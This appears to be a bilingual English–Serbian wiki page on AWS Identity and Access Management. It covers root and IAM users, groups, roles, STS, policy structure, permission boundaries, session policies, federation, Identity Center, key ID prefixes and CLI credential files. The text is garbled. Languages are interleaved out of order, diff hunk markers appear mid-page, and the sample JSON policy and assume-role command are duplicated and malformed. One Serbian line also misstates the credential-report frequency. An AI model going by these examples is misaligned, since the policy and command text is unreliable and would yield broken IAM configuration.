- **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification.
- **Authorization** - Determines what an identity can access within a system once it's been authenticated to it.
- **Access Control** - The method and process of how access is granted to a secure resource
- **Autentifikacija** - Proces definisanja identiteta i verifikacije tog identiteta. Ovaj proces se može podeliti na: Identifikaciju i verifikaciju.
- **Autorizacija** - Određuje šta identitet može da pristupi unutar sistema nakon što je autentifikovan.
- **Kontrola pristupa** - Metod i proces kako se pristup dodeljuje sigurnom resursu.
IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account.
IAM se može definisati po svojoj sposobnosti da upravlja, kontroliše i reguliše mehanizme autentifikacije, autorizacije i kontrole pristupa identiteta vašim resursima unutar vašeg AWS naloga.
### [AWS account root user](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html) <a href="#id_root" id="id_root"></a>
### [AWS nalog root korisnika](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html) <a href="#id_root" id="id_root"></a>
When you first create an Amazon Web Services (AWS) account, you begin with a single sign-in identity that has **complete access to all** AWS services and resources in the account. This is the AWS account _**root user**_ and is accessed by signing in with the **email address and password that you used to create the account**.
Kada prvi put kreirate Amazon Web Services (AWS) nalog, počinjete sa jednim identitetom za prijavu koji ima **potpun pristup svim** AWS uslugama i resursima u nalogu. Ovo je _**root korisnik**_ AWS naloga i pristupa mu se prijavom sa **email adresom i lozinkom koje ste koristili za kreiranje naloga**.
Note that a new **admin user** will have **less permissions that the root user**.
Napomena da novi **admin korisnik** ima **manje dozvole od root korisnika**.
From a security point of view, it's recommended to create other users and avoid using this one.
Sa bezbednosnog stanovišta, preporučuje se kreiranje drugih korisnika i izbegavanje korišćenja ovog.
### [IAM users](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html) <a href="#id_iam-users" id="id_iam-users"></a>
### [IAM korisnici](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html) <a href="#id_iam-users" id="id_iam-users"></a>
An IAM _user_ is an entity that you create in AWS to **represent the person or application** that uses it to **interact with AWS**. A user in AWS consists of a name and credentials (password and up to two access keys).
IAM _korisnik_ je entitet koji kreirate u AWS-u da **predstavlja osobu ili aplikaciju** koja ga koristi za **interakciju sa AWS-om**. Korisnik u AWS-u se sastoji od imena i akreditiva (lozinka i do dva pristupna ključa).
When you create an IAM user, you grant it **permissions** by making it a **member of a user group** that has appropriate permission policies attached (recommended), or by **directly attaching policies** to the user.
Kada kreirate IAM korisnika, dodeljujete mu **dozvole** tako što ga činite **članom korisničke grupe** koja ima odgovarajuće politike dozvola (preporučeno), ili **direktno povezivanjem politika** sa korisnikom.
Users can have **MFA enabled to login** through the console. API tokens of MFA enabled users aren't protected by MFA. If you want to **restrict the access of a users API keys using MFA** you need to indicate in the policy that in order to perform certain actions MFA needs to be present (example [**here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html)).
Korisnici mogu imati **omogućen MFA za prijavu** putem konzole. API tokeni korisnika sa omogućenim MFA nisu zaštićeni MFA. Ako želite da **ograničite pristup API ključevima korisnika koristeći MFA**, morate naznačiti u politici da je za izvršavanje određenih radnji MFA potrebno (primer [**ovde**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html)).
#### CLI
- **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT
- **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs).
- **ID pristupnog ključa**: 20 nasumičnih velikih alfanumeričkih karaktera kao što su AKHDNAPO86BSHKDIRYT
- **ID tajnog pristupnog ključa**: 40 nasumičnih velikih i malih karaktera: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (Nije moguće povratiti izgubljene ID-ove tajnog pristupnog ključa).
Whenever you need to **change the Access Key** this is the process you should follow:\
Kad god trebate da **promenite pristupni ključ**, ovo je proces koji treba da pratite:\
&#xNAN;_&#x43;reate a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_
### MFA - Multi Factor Authentication
### MFA - Višefaktorska autentifikacija
It's used to **create an additional factor for authentication** in addition to your existing methods, such as password, therefore, creating a multi-factor level of authentication.\
You can use a **free virtual application or a physical device**. You can use apps like google authentication for free to activate a MFA in AWS.
Koristi se za **kreiranje dodatnog faktora za autentifikaciju** pored vaših postojećih metoda, kao što je lozinka, čime se stvara višefaktorski nivo autentifikacije.\
Možete koristiti **besplatnu virtuelnu aplikaciju ili fizički uređaj**. Možete koristiti aplikacije poput Google autentifikacije besplatno za aktivaciju MFA u AWS-u.
Policies with MFA conditions can be attached to the following:
Politike sa MFA uslovima mogu se povezati sa sledećim:
- An IAM user or group
- A resource such as an Amazon S3 bucket, Amazon SQS queue, or Amazon SNS topic
- The trust policy of an IAM role that can be assumed by a user
If you want to **access via CLI** a resource that **checks for MFA** you need to call **`GetSessionToken`**. That will give you a token with info about MFA.\
Note that **`AssumeRole` credentials don't contain this information**.
- IAM korisnikom ili grupom
- Resursom kao što je Amazon S3 bucket, Amazon SQS queue ili Amazon SNS topic
- Politika poverenja IAM uloge koju može preuzeti korisnik
Ako želite da **pristupite putem CLI** resursu koji **proverava MFA**, morate pozvati **`GetSessionToken`**. To će vam dati token sa informacijama o MFA.\
Napomena da **`AssumeRole` akreditivi ne sadrže ove informacije**.
```bash
aws sts get-session-token --serial-number <arn_device> --token-code <code>
```
As [**stated here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html), postoje mnogi različiti slučajevi gde **MFA ne može biti korišćen**.
As [**stated here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html), there are a lot of different cases where **MFA cannot be used**.
### [IAM korisničke grupe](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) <a href="#id_iam-groups" id="id_iam-groups"></a>
### [IAM user groups](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) <a href="#id_iam-groups" id="id_iam-groups"></a>
IAM [korisnička grupa](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) je način da se **prikače politike više korisnika** u isto vreme, što može olakšati upravljanje dozvolama za te korisnike. **Uloge i grupe ne mogu biti deo grupe**.
An IAM [user group](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) is a way to **attach policies to multiple users** at one time, which can make it easier to manage the permissions for those users. **Roles and groups cannot be part of a group**.
Možete prikačiti **politiku zasnovanu na identitetu korisničkoj grupi** tako da svi **korisnici** u korisničkoj grupi **dobiju dozvole politike**. **Ne možete** identifikovati **korisničku grupu** kao **`Principal`** u **politici** (kao što je politika zasnovana na resursima) jer se grupe odnose na dozvole, a ne na autentifikaciju, a principi su autentifikovani IAM entiteti.
You can attach an **identity-based policy to a user group** so that all of the **users** in the user group **receive the policy's permissions**. You **cannot** identify a **user group** as a **`Principal`** in a **policy** (such as a resource-based policy) because groups relate to permissions, not authentication, and principals are authenticated IAM entities.
Evo nekih važnih karakteristika korisničkih grupa:
Here are some important characteristics of user groups:
- **Korisnička grupa** može **sadržati mnogo korisnika**, a **korisnik** može **pripadati više grupa**.
- **Korisničke grupe ne mogu biti ugnježdene**; mogu sadržati samo korisnike, ne i druge korisničke grupe.
- Ne postoji **podrazumevana korisnička grupa koja automatski uključuje sve korisnike u AWS nalogu**. Ako želite da imate takvu korisničku grupu, morate je kreirati i dodeliti svakom novom korisniku.
- Broj i veličina IAM resursa u AWS nalogu, kao što su broj grupa i broj grupa kojima korisnik može biti član, su ograničeni. Za više informacija, pogledajte [IAM i AWS STS kvote](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html).
- A user **group** can **contain many users**, and a **user** can **belong to multiple groups**.
- **User groups can't be nested**; they can contain only users, not other user groups.
- There is **no default user group that automatically includes all users in the AWS account**. If you want to have a user group like that, you must create it and assign each new user to it.
- The number and size of IAM resources in an AWS account, such as the number of groups, and the number of groups that a user can be a member of, are limited. For more information, see [IAM and AWS STS quotas](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html).
### [IAM uloge](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html) <a href="#id_iam-roles" id="id_iam-roles"></a>
### [IAM roles](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html) <a href="#id_iam-roles" id="id_iam-roles"></a>
IAM **uloga** je vrlo **slična** **korisniku**, jer je to **identitet sa politikama dozvola koje određuju šta** može i ne može da radi u AWS-u. Međutim, uloga **nema nikakve akreditive** (lozinku ili pristupne ključeve) povezane sa njom. Umesto da bude jedinstveno povezana sa jednom osobom, uloga je namenjena da bude **preuzeta od strane bilo koga ko je treba (i ima dovoljno dozvola)**. **IAM korisnik može preuzeti ulogu da privremeno** preuzme različite dozvole za određeni zadatak. Uloga može biti **dodeljena** [**federisanom korisniku**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html) koji se prijavljuje koristeći eksternog provajdera identiteta umesto IAM-a.
An IAM **role** is very **similar** to a **user**, in that it is an **identity with permission policies that determine what** it can and cannot do in AWS. However, a role **does not have any credentials** (password or access keys) associated with it. Instead of being uniquely associated with one person, a role is intended to be **assumable by anyone who needs it (and have enough perms)**. An **IAM user can assume a role to temporarily** take on different permissions for a specific task. A role can be **assigned to a** [**federated user**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html) who signs in by using an external identity provider instead of IAM.
An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining **who can assume** the role, and a **permissions policy**, which cannot be empty, defining **what it can access**.
IAM uloga se sastoji od **dvaju tipova politika**: **politika poverenja**, koja ne može biti prazna, definišući **ko može preuzeti** ulogu, i **politika dozvola**, koja ne može biti prazna, definišući **šta može pristupiti**.
#### AWS Security Token Service (STS)
AWS Security Token Service (STS) is a web service that facilitates the **issuance of temporary, limited-privilege credentials**. It is specifically tailored for:
AWS Security Token Service (STS) je veb servis koji olakšava **izdavanje privremenih, ograničenih akreditiva**. Specijalno je prilagođen za:
### [Temporary credentials in IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html) <a href="#id_temp-creds" id="id_temp-creds"></a>
### [Privremeni akreditivi u IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html) <a href="#id_temp-creds" id="id_temp-creds"></a>
**Temporary credentials are primarily used with IAM roles**, but there are also other uses. You can request temporary credentials that have a more restricted set of permissions than your standard IAM user. This **prevents** you from **accidentally performing tasks that are not permitted** by the more restricted credentials. A benefit of temporary credentials is that they expire automatically after a set period of time. You have control over the duration that the credentials are valid.
**Privremeni akreditivi se prvenstveno koriste sa IAM ulogama**, ali postoje i druge upotrebe. Možete zatražiti privremene akreditive koji imaju ograničeniji skup dozvola od vašeg standardnog IAM korisnika. Ovo **sprečava** vas od **slučajnog obavljanja zadataka koji nisu dozvoljeni** sa ograničenim akreditivima. Prednost privremenih akreditiva je ta što automatski ističu nakon određenog vremenskog perioda. Imate kontrolu nad trajanjem tokom kojeg su akreditivi validni.
### Policies
### Politike
#### Policy Permissions
#### Dozvole politike
Are used to assign permissions. There are 2 types:
Koriste se za dodeljivanje dozvola. Postoje 2 tipa:
- AWS managed policies (preconfigured by AWS)
- Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI view that helps you granting and denying permissions) or writing your own..
By **default access** is **denied**, access will be granted if an explicit role has been specified.\
If **single "Deny" exist, it will override the "Allow"**, except for requests that use the AWS account's root security credentials (which are allowed by default).
- AWS upravljane politike (prekonfigurisane od strane AWS-a)
- Politike koje upravlja korisnik: Konfigurišete ih vi. Možete kreirati politike zasnovane na AWS upravljanim politikama (modifikujući jednu od njih i kreirajući svoju), koristeći generator politika (GUI prikaz koji vam pomaže u dodeljivanju i odbijanju dozvola) ili pišući svoje.
Po **podrazumevanju, pristup** je **odbijen**, pristup će biti odobren ako je eksplicitna uloga navedena.\
Ako **jedna "Odbij" postoji, ona će nadjačati "Dozvoli"**, osim za zahteve koji koriste korenske bezbednosne akreditive AWS naloga (koji su podrazumevano dozvoljeni).
```javascript
{
"Version": "2012-10-17", //Version of the policy
"Statement": [ //Main element, there can be more than 1 entry in this array
{
"Sid": "Stmt32894y234276923" //Unique identifier (optional)
"Effect": "Allow", //Allow or deny
"Action": [ //Actions that will be allowed or denied
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //Resource the action and effect will be applied to
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Optional element that allow to control when the permission will be effective
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
"Version": "2012-10-17", //Version of the policy
"Statement": [ //Main element, there can be more than 1 entry in this array
{
"Sid": "Stmt32894y234276923" //Unique identifier (optional)
"Effect": "Allow", //Allow or deny
"Action": [ //Actions that will be allowed or denied
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //Resource the action and effect will be applied to
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Optional element that allow to control when the permission will be effective
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
```
The [global fields that can be used for conditions in any service are documented here](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount).\
The [specific fields that can be used for conditions per service are documented here](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html).
#### Inline Policies
This kind of policies are **directly assigned** to a user, group or role. Then, they do not appear in the Policies list as any other one can use them.\
Inline policies are useful if you want to **maintain a strict one-to-one relationship between a policy and the identity** that it's applied to. For example, you want to be sure that the permissions in a policy are not inadvertently assigned to an identity other than the one they're intended for. When you use an inline policy, the permissions in the policy cannot be inadvertently attached to the wrong identity. In addition, when you use the AWS Management Console to delete that identity, the policies embedded in the identity are deleted as well. That's because they are part of the principal entity.
Ova vrsta politika je **direktno dodeljena** korisniku, grupi ili ulozi. Tada se ne pojavljuju na listi politika kao što to može biti slučaj sa bilo kojom drugom.\
Inline politike su korisne ako želite da **održite strogu jedan-na-jedan vezu između politike i identiteta** na koji se primenjuju. Na primer, želite da budete sigurni da dozvole u politici nisu nenamerno dodeljene identitetu osim onog za koji su namenjene. Kada koristite inline politiku, dozvole u politici ne mogu biti nenamerno povezane sa pogrešnim identitetom. Pored toga, kada koristite AWS Management Console za brisanje tog identiteta, politike ugrađene u identitet se takođe brišu. To je zato što su deo glavne entiteta.
#### Resource Bucket Policies
These are **policies** that can be defined in **resources**. **Not all resources of AWS supports them**.
Ovo su **politike** koje se mogu definisati u **resursima**. **Nisu svi resursi AWS-a podržavaju njih**.
If a principal does not have an explicit deny on them, and a resource policy grants them access, then they are allowed.
Ako glavni entitet nema eksplicitnu zabranu na njih, a politika resursa im omogućava pristup, tada su dozvoljeni.
### IAM Boundaries
IAM boundaries can be used to **limit the permissions a user or role should have access to**. This way, even if a different set of permissions are granted to the user by a **different policy** the operation will **fail** if he tries to use them.
IAM granice se mogu koristiti za **ograničavanje dozvola kojima korisnik ili uloga treba da imaju pristup**. Na ovaj način, čak i ako se korisniku dodeli drugačiji skup dozvola putem **druge politike**, operacija će **neuspeti** ako pokuša da ih koristi.
A boundary is just a policy attached to a user which **indicates the maximum level of permissions the user or role can have**. So, **even if the user has Administrator access**, if the boundary indicates he can only read S· buckets, that's the maximum he can do.
Granica je samo politika koja je povezana sa korisnikom i **ukazuje na maksimalni nivo dozvola koje korisnik ili uloga mogu imati**. Dakle, **čak i ako korisnik ima Administrator pristup**, ako granica ukazuje da može samo da čita S· kante, to je maksimum što može da uradi.
**This**, **SCPs** and **following the least privilege** principle are the ways to control that users doesn't have more permissions than the ones he needs.
**Ovo**, **SCPs** i **pridržavanje principa minimalnih privilegija** su načini da se kontroliše da korisnici nemaju više dozvola nego što im je potrebno.
### Session Policies
A session policy is a **policy set when a role is assumed** somehow. This will be like an **IAM boundary for that session**: This means that the session policy doesn't grant permissions but **restrict them to the ones indicated in the policy** (being the max permissions the ones the role has).
This is useful for **security meassures**: When an admin is going to assume a very privileged role he could restrict the permission to only the ones indicated in the session policy in case the session gets compromised.
Politika sesije je **politika postavljena kada se uloga preuzima** na neki način. Ovo će biti kao **IAM granica za tu sesiju**: To znači da politika sesije ne dodeljuje dozvole, već **ograničava ih na one koje su navedene u politici** (maksimalne dozvole su one koje uloga ima).
Ovo je korisno za **bezbednosne mere**: Kada administrator preuzima veoma privilegovanu ulogu, mogao bi da ograniči dozvolu samo na one koje su navedene u politici sesije u slučaju da sesija bude kompromitovana.
```bash
aws sts assume-role \
--role-arn <value> \
--role-session-name <value> \
[--policy-arns <arn_custom_policy1> <arn_custom_policy2>]
[--policy <file://policy.json>]
--role-arn <value> \
--role-session-name <value> \
[--policy-arns <arn_custom_policy1> <arn_custom_policy2>]
[--policy <file://policy.json>]
```
Napomena da po defaultu **AWS može dodati politike sesije sesijama** koje će biti generisane zbog trećih razloga. Na primer, u [neautentifikovanim cognito pretpostavljenim rolama](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles) po defaultu (koristeći poboljšanu autentifikaciju), AWS će generisati **akreditiv sesije sa politikom sesije** koja ograničava usluge kojima sesija može pristupiti [**na sledeću listu**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services).
Note that by default **AWS might add session policies to sessions** that are going to be generated because of third reasons. For example, in [unauthenticated cognito assumed roles](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles) by default (using enhanced authentication), AWS will generate **session credentials with a session policy** that limits the services that session can access [**to the following list**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services).
Stoga, ako se u nekom trenutku suočite sa greškom "... jer nijedna politika sesije ne dozvoljava ...", a uloga ima pristup za izvršenje akcije, to je zato što **postoji politika sesije koja to sprečava**.
Therefore, if at some point you face the error "... because no session policy allows the ...", and the role has access to perform the action, it's because **there is a session policy preventing it**.
### Identitetna federacija
### Identity Federation
Identitetna federacija **omogućava korisnicima iz identitetskih provajdera koji su eksterni** za AWS da sigurno pristupaju AWS resursima bez potrebe da dostavljaju AWS korisničke akreditive iz važećeg IAM korisničkog naloga.\
Primer identitetskog provajdera može biti vaša vlastita korporativna **Microsoft Active Directory** (putem **SAML**) ili **OpenID** usluga (kao što je **Google**). Federisani pristup će tada omogućiti korisnicima unutar njega da pristupaju AWS-u.
Identity federation **allows users from identity providers which are external** to AWS to access AWS resources securely without having to supply AWS user credentials from a valid IAM user account.\
An example of an identity provider can be your own corporate **Microsoft Active Directory** (via **SAML**) or **OpenID** services (like **Google**). Federated access will then allow the users within it to access AWS.
Da biste konfigurisali ovo poverenje, generiše se **IAM identitetski provajder (SAML ili OAuth)** koji će **verovati** **drugoj platformi**. Zatim, najmanje jedna **IAM uloga se dodeljuje (verujuća) identitetskom provajderu**. Ako korisnik iz poverene platforme pristupi AWS-u, pristupaće kao pomenuta uloga.
To configure this trust, an **IAM Identity Provider is generated (SAML or OAuth)** that will **trust** the **other platform**. Then, at least one **IAM role is assigned (trusting) to the Identity Provider**. If a user from the trusted platform access AWS, he will be accessing as the mentioned role.
However, you will usually want to give a **different role depending on the group of the user** in the third party platform. Then, several **IAM roles can trust** the third party Identity Provider and the third party platform will be the one allowing users to assume one role or the other.
Međutim, obično ćete želeti da dodelite **različitu ulogu u zavisnosti od grupe korisnika** na trećoj strani. Tada, nekoliko **IAM uloga može verovati** trećem identitetskom provajderu, a treća platforma će biti ta koja omogućava korisnicima da preuzmu jednu ili drugu ulogu.
<figure><img src="../../../images/image (247).png" alt=""><figcaption></figcaption></figure>
### IAM Identity Center
### IAM Identitetni Centar
AWS IAM Identity Center (successor to AWS Single Sign-On) expands the capabilities of AWS Identity and Access Management (IAM) to provide a **central plac**e that brings together **administration of users and their access to AWS** accounts and cloud applications.
AWS IAM Identitetni Centar (naslednik AWS Single Sign-On) proširuje mogućnosti AWS upravljanja identitetom i pristupom (IAM) kako bi pružio **centralno mesto** koje okuplja **administraciju korisnika i njihov pristup AWS** nalozima i cloud aplikacijama.
The login domain is going to be something like `<user_input>.awsapps.com`.
Domen za prijavu će biti nešto poput `<user_input>.awsapps.com`.
To login users, there are 3 identity sources that can be used:
Da bi se prijavili korisnici, postoje 3 izvora identiteta koji se mogu koristiti:
- Identity Center Directory: Regular AWS users
- Active Directory: Supports different connectors
- External Identity Provider: All users and groups come from an external Identity Provider (IdP)
- Identitetni Centar Direktorijum: Redovni AWS korisnici
- Active Directory: Podržava različite konektore
- Eksterni identitetski provajder: Svi korisnici i grupe dolaze iz eksternog identitetskog provajdera (IdP)
<figure><img src="../../../images/image (279).png" alt=""><figcaption></figcaption></figure>
In the simplest case of Identity Center directory, the **Identity Center will have a list of users & groups** and will be able to **assign policies** to them to **any of the accounts** of the organization.
U najjednostavnijem slučaju direktorijuma Identitetnog Centra, **Identitetni Centar će imati listu korisnika i grupa** i moći će da **dodeli politike** njima za **bilo koji od naloga** organizacije.
In order to give access to a Identity Center user/group to an account a **SAML Identity Provider trusting the Identity Center will be created**, and a **role trusting the Identity Provider with the indicated policies will be created** in the destination account.
Da biste dali pristup korisniku/grupi Identitetnog Centra nalogu, **biće kreiran SAML identitetski provajder koji veruje Identitetnom Centru**, a **uloga koja veruje identitetskom provajderu sa navedenim politikama biće kreirana** u odredišnom nalogu.
#### AwsSSOInlinePolicy
It's possible to **give permissions via inline policies to roles created via IAM Identity Center**. The roles created in the accounts being given **inline policies in AWS Identity Center** will have these permissions in an inline policy called **`AwsSSOInlinePolicy`**.
Moguće je **dati dozvole putem inline politika rolama kreiranim putem IAM Identitetnog Centra**. Uloge kreirane u nalozima koje dobijaju **inline politike u AWS Identitetnom Centru** će imati ove dozvole u inline politici pod nazivom **`AwsSSOInlinePolicy`**.
Therefore, even if you see 2 roles with an inline policy called **`AwsSSOInlinePolicy`**, it **doesn't mean it has the same permissions**.
Stoga, čak i ako vidite 2 uloge sa inline politikom pod nazivom **`AwsSSOInlinePolicy`**, to **ne znači da imaju iste dozvole**.
### Cross Account Trusts and Roles
**A user** (trusting) can create a Cross Account Role with some policies and then, **allow another user** (trusted) to **access his account** but only **having the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offers two options. Providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account.\
It's recommended to **specify the user who is trusted and not put some generic thing** because if not, other authenticated users like federated users will be able to also abuse this trust.
**Korisnik** (verujući) može kreirati Cross Account ulogu sa nekim politikama i zatim **dozvoliti drugom korisniku** (verovanom) da **pristupi njegovom nalogu** ali samo **imajući pristup naznačen u novim politikama uloge**. Da biste to kreirali, jednostavno kreirajte novu ulogu i izaberite Cross Account ulogu. Uloge za pristup između naloga nude dve opcije. Pružanje pristupa između AWS naloga koje posedujete, i pružanje pristupa između naloga koji posedujete i trećeg AWS naloga.\
Preporučuje se da **precizirate korisnika koji je poveren i ne stavljate neku generičku stvar** jer u suprotnom, drugi autentifikovani korisnici poput federisanih korisnika će takođe moći da zloupotrebe ovo poverenje.
### AWS Simple AD
Not supported:
Nije podržano:
- Trust Relations
- AD Admin Center
- Full PS API support
- AD Recycle Bin
- Group Managed Service Accounts
- Schema Extensions
- No Direct access to OS or Instances
- Odnos poverenja
- AD Admin Centar
- Puna PS API podrška
- AD Kanta za reciklažu
- Grupa upravljanih servisnih naloga
- Proširenja šeme
- Nema direktan pristup OS-u ili instancama
#### Web Federation or OpenID Authentication
#### Web Federacija ili OpenID Autentifikacija
The app uses the AssumeRoleWithWebIdentity to create temporary credentials. However, this doesn't grant access to the AWS console, just access to resources within AWS.
Aplikacija koristi AssumeRoleWithWebIdentity za kreiranje privremenih akreditiva. Međutim, ovo ne daje pristup AWS konzoli, samo pristup resursima unutar AWS-a.
### Other IAM options
### Druge IAM opcije
- You can **set a password policy setting** options like minimum length and password requirements.
- You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**.
- Možete **postaviti podešavanje politike lozinke** kao što su minimalna dužina i zahtevi za lozinku.
- Možete **preuzeti "Izveštaj o akreditivima"** sa informacijama o trenutnim akreditivima (kao što su vreme kreiranja korisnika, da li je lozinka omogućena...). Možete generisati izveštaj o akreditivima koliko često želite, čak i jednom svaka **četiri sata**.
AWS Identity and Access Management (IAM) provides **fine-grained access control** across all of AWS. With IAM, you can specify **who can access which services and resources**, and under which conditions. With IAM policies, you manage permissions to your workforce and systems to **ensure least-privilege permissions**.
AWS upravljanje identitetom i pristupom (IAM) pruža **fino podešavanje kontrole pristupa** širom celog AWS-a. Sa IAM-om, možete precizirati **ko može pristupiti kojim uslugama i resursima**, i pod kojim uslovima. Sa IAM politikama, upravljate dozvolama za vašu radnu snagu i sisteme kako biste **osigurali dozvole sa najmanjim privilegijama**.
### IAM ID Prefixes
### IAM ID Prefiksi
In [**this page**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids) you can find the **IAM ID prefixe**d of keys depending on their nature:
Na [**ovoj stranici**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids) možete pronaći **IAM ID prefikse** ključeva u zavisnosti od njihove prirode:
| ABIA | [AWS STS service bearer token](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html) |
| ABIA | [AWS STS servisni token nosilac](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html) |
| ---- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| ACCA | Context-specific credential |
| AGPA | User group |
| AIDA | IAM user |
| AIPA | Amazon EC2 instance profile |
| AKIA | Access key |
| ANPA | Managed policy |
| ANVA | Version in a managed policy |
| APKA | Public key |
| AROA | Role |
| ASCA | Certificate |
| ASIA | [Temporary (AWS STS) access key IDs](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) use this prefix, but are unique only in combination with the secret access key and the session token. |
| ACCA | Kontekstualni akreditiv |
| AGPA | Korisnička grupa |
| AIDA | IAM korisnik |
| AIPA | Amazon EC2 profil instance |
| AKIA | Pristupni ključ |
| ANPA | Upravljana politika |
| ANVA | Verzija u upravljanoj politici |
| APKA | Javni ključ |
| AROA | Uloga |
| ASCA | Sertifikat |
| ASIA | [Privremeni (AWS STS) pristupni ključ ID-ovi](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) koriste ovaj prefiks, ali su jedinstveni samo u kombinaciji sa tajnim pristupnim ključem i tokenom sesije. |
### Recommended permissions to audit accounts
### Preporučene dozvole za reviziju naloga
The following privileges grant various read access of metadata:
Sledeće privilegije daju različit pristup metapodacima:
- `arn:aws:iam::aws:policy/SecurityAudit`
- `arn:aws:iam::aws:policy/job-function/ViewOnlyAccess`
@@ -336,14 +326,13 @@ The following privileges grant various read access of metadata:
- `directconnect:DescribeConnections`
- `dynamodb:ListTables`
## Misc
## Razno
### CLI Authentication
In order for a regular user authenticate to AWS via CLI you need to have **local credentials**. By default you can configure them **manually** in `~/.aws/credentials` or by **running** `aws configure`.\
In that file you can have more than one profile, if **no profile** is specified using the **aws cli**, the one called **`[default]`** in that file will be used.\
Example of credentials file with more than 1 profile:
### CLI Autentifikacija
Da bi regularni korisnik autentifikovao AWS putem CLI, potrebno je imati **lokalne akreditive**. Po defaultu, možete ih konfigurisati **ručno** u `~/.aws/credentials` ili **pokretanjem** `aws configure`.\
U toj datoteci možete imati više od jednog profila, ako **nije specificiran profil** koristeći **aws cli**, koristiće se onaj nazvan **`[default]`** u toj datoteci.\
Primer datoteke akreditiva sa više od 1 profila:
```
[default]
aws_access_key_id = AKIA5ZDCUJHF83HDTYUT
@@ -354,12 +343,10 @@ aws_access_key_id = AKIA8YDCu7TGTR356SHYT
aws_secret_access_key = uOcdhof683fbOUGFYEQuR2EIHG34UY987g6ff7
region = eu-west-2
```
Ako treba da pristupite **različitim AWS nalozima** i vašem profilu je dato pravo da **pretpostavi ulogu unutar tih naloga**, ne morate ručno pozivati STS svaki put (`aws sts assume-role --role-arn <role-arn> --role-session-name sessname`) i konfigurisati akreditive.
If you need to access **different AWS accounts** and your profile was given access to **assume a role inside those accounts**, you don't need to call manually STS every time (`aws sts assume-role --role-arn <role-arn> --role-session-name sessname`) and configure the credentials.
You can use the `~/.aws/config` file to[ **indicate which roles to assume**](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html), and then use the `--profile` param as usual (the `assume-role` will be performed in a transparent way for the user).\
A config file example:
Možete koristiti `~/.aws/config` datoteku da **naznačite koje uloge da pretpostavite** i zatim koristiti `--profile` parametar kao i obično (pretpostavljanje uloge će se izvršiti na transparentan način za korisnika).\
Primer konfiguracione datoteke:
```
[profile acc2]
region=eu-west-2
@@ -368,23 +355,16 @@ role_session_name = <session_name>
source_profile = <profile_with_assume_role>
sts_regional_endpoints = regional
```
With this config file you can then use aws cli like:
Sa ovom konfiguracionom datotekom možete koristiti aws cli kao:
```
aws --profile acc2 ...
```
Ako tražite nešto **slično** ovome, ali za **pregledač**, možete proveriti **ekstenziju** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en).
